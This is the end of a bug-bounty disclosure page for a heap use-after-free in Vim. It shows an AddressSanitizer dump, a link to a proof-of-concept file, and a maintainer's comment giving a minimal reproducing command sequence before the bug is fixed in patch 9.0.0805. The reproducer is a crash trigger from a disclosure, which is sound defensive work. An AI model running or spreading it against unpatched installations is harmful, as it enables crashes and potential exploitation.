  0x0c36800037e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c36800037f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680003800: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680003810: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680003820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==147326==ABORTING

poc download url: https://github.com/Janette88/vim/blob/main/poc14_huaf.dat

Impact

Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

We are processing your report and will contact the vim team within 24 hours. 2 months ago
We have contacted a member of the vim team and are waiting to hear back 2 months ago
Bram Moolenaar
2 months ago

Maintainer


I can reproduce it, but the POC is much too complicated. The first line isn't needed and instead of the script sourcing itself (leading to recursive execution) just doing it twice is sufficient. And then some lines can be dropped: lexpr '' lopen au FileType * call setloclist(0, [], 'f') lolder lexpr ''

Bram Moolenaar
a month ago

Maintainer


Fixed with patch 9.0.0805

Bram Moolenaar validated this vulnerability a month ago
janette88 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bram Moolenaar marked this as fixed in 9.0.0805 with commit d0fab1 a month ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability will not receive a CVE
janette88
a month ago

Researcher


@admin Can I get a cve for this bug report?

Ben Harvie
a month ago

Admin


Hi, the maintainer now has control over CVE publication at the "Publish" stage of the report.

janette88
a month ago

Researcher


see.....I'd thought the admin missed the cve assginment ~~~~because the bug could be reproduced and the poc was applicable @admin.

Pavlos published this vulnerability 3 days ago
to join this conversation